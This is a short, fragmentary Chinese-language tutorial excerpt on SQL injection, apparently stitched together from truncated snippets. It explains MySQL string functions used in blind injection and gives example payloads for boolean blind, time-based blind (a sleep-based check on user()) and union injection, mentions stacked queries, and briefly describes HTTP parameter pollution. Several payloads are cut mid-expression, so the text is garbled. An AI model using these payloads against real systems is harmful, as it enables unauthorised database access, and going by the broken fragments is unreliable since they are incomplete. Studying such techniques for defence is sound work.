注意这里的pos位置是从1开始的,不是数组的0开始
mid(str,pos,len) :跟上面的一样,截取字符串
ascii(str) :返回字符串str的最左面字符的ASCII代码值
ord(str)...()),1,1))>64 /*判断数据库名的第一个字符的ascii值是否大于64*/
时间盲注
id=1 union select if(SUBSTRING(user(),1,1)='root',sleep...(4),1),null,null /*提取用户名第一个个字符做判断,正确就延迟4秒,错误返回1*/
union注入
id =-1 union select 1,2,3 /*获取字段*/
Boolean...在我们的web 系统中, 因为代码通常只返回一个查询结果, 因此, 堆叠注入第二个语句产生错误或者结果只能被忽略, 我们在前端界面是无法看到返回结果的。...请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击
举个例子,我在谷歌和百度搜索的时候都将查询的参数传两次,谷歌会都作为搜索内容加载,百度则只加载第一个